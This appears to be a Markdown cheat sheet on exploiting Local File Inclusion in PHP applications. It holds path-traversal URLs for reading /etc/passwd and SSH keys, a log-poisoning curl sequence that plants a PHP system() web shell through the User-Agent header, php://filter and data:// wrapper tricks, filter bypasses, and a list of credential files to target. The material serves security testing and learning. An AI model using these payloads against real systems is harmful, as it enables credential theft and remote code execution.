95 lines
3.1 KiB
Markdown
95 lines
3.1 KiB
Markdown
# Local File Inclusion
|
|
To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
|
|
|
|
* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
|
|
## PHP Functions
|
|
* Functions provoking an LFI
|
|
```php
|
|
include()
|
|
require()
|
|
include_once ()
|
|
require_once()
|
|
```
|
|
|
|
## Usage
|
|
|
|
* Exploit URL parameter by including other files.
|
|
```
|
|
http://example.com/home?page=about.html
|
|
http://example.com/home?page=/etc/passwd
|
|
```
|
|
* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
|
|
```
|
|
http://example.com/home?page=../../../../etc/passwd
|
|
```
|
|
or
|
|
```
|
|
http://example.com/home?page=html/../../../home/<username>/.ssh/id_rsa
|
|
```
|
|
|
|
### Log Poisoning
|
|
* Inject malicious code into logfiles before using path traversal to open the logfile and trigger the rce.
|
|
* `www-data` needs read & write permisson in order to do so.
|
|
* Include php code into the `User-Agent` header of the HTTP request. For example a GET parameter to deliver system commandsas follows
|
|
```sh
|
|
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
|
|
```
|
|
|
|
* Follow up with a request to
|
|
|
|
```HTTP
|
|
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
|
```
|
|
|
|
### /proc/self/fd
|
|
* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
|
|
* Log poisoning and opening logfile via `/proc/self/fd/xx`.
|
|
|
|
## Files of Interest
|
|
* `/etc/issue`
|
|
* `/etc/profile`
|
|
* `/proc/version`
|
|
* `/etc/passwd`
|
|
* `/etc/apache2/.htpasswd`
|
|
* `/etc/shadow`
|
|
* `/etc/group`
|
|
* `/etc/motd`
|
|
* `/etc/mysql/my.cnf`
|
|
* `/root/.bash_history`
|
|
* `/var/log/dmessage`
|
|
* `/var/mail/root`
|
|
* `/root/.ssh/id_rsa`
|
|
* `/var/log/apache2/access.log`
|
|
* `C:\boot.ini`
|
|
* `/proc/self/fd/xx`
|
|
* `/proc/version`
|
|
* `/proc/cmdline`
|
|
* `/proc/[0-9]*/fd/[0-9]*`
|
|
|
|
* `sess_<cookieValue>` if the location of the session file is known. Some paths are
|
|
```sh
|
|
c:\Windows\Temp
|
|
/tmp/
|
|
/var/lib/php5
|
|
/var/lib/php/session
|
|
```
|
|
|
|
### Base64 Encoding via PHP
|
|
* Circumvent filter via encoding local files included ins a GET parameter value
|
|
* __Read PHP files through encoding them, so they won't be executed__
|
|
```http
|
|
curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
|
|
curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd
|
|
```
|
|
* Use encoded data as input through the parameter
|
|
```sh
|
|
curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo=
|
|
```
|
|
|
|
## Tricks
|
|
|
|
* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
|
|
* Terminate query with `/.`
|
|
* `..//..//..//file`, double slashes
|
|
* URL encode path
|